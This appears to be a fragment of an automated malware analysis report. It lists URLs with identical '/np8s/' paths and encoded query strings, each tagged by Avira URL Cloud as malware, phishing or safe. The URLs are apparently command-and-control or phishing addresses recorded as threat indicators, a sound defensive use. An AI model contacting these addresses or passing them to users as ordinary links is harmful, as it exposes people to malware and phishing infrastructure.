http://www.harmlett.com/np8s/?3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w==&Eh=mhUxl true
  • Avira URL Cloud: safe
 unknown
http://www.topings33.com/np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl true
  • Avira URL Cloud: malware
 unknown
www.gafcbooster.com/np8s/ true
  • Avira URL Cloud: malware
 low
http://www.waermark.com/np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&aDHdzD=vpgdJ4mxrh true
  • Avira URL Cloud: malware
 unknown
http://www.tentanguang.online/np8s/ true
  • Avira URL Cloud: phishing
 unknown
http://www.getbusinesscreditandfunding.com/np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&aDHdzD=vpgdJ4mxrh true
  • Avira URL Cloud: malware
 unknown
http://www.siberup.xyz/np8s/?3fk4oN=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1BJBbWkp2bvyU0/jbw==&Eh=mhUxl true
  • Avira URL Cloud: safe
 unknown